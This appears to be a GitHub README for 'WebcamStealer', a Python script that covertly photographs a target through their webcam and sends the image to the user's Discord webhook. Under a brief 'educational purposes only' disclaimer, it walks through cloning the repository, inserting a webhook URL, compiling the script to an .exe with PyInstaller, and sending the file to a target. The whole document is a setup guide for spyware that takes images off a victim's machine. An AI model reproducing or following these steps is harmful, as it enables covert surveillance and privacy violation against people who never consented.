
This is a python script that lets user to get target's photo from webcam.

Primary LanguagePython


This is a python script that lets user to get target's photo from webcam.


Use this for educational purposes only under legal parameters. This is made for educational purpose and fair use only. We respect other's privacy and we discourage illegal use of this.



  • Download .zip file.
  • Unzip this file.
  • Open file with any code/text editor. i.e., vscode, notepad, etc.
  • Replace REPLACE_THIS_WITH_YOUR_DISCORD_WEBHOOK_URL with your actual discord webhook URL.
  • Save file.
  • Now compile this .py file to .exe file using 'Pyinstaller' or 'py-to-exe'.
  • You are all ready to send this file but if you need good UI/GUI then you can configure this further.


  • Open terminal.
  • Clone this repository.
$ git clone https://github.com/itzNamanDev/WebcamStealer
  • Open directory.
cd WebcamStealer
  • View code inside of security.py.
cat security.py
  • Edit the file and replace REPLACE_THIS_WITH_YOUR_DISCORD_WEBHOOK_URL with your actual discord webhook URL.
  • You can directly do it in notepad but if you want to professionally do it then use a tool calkled 'nano'.


nano security.py


  • Compile this .py to .exe and send this to target.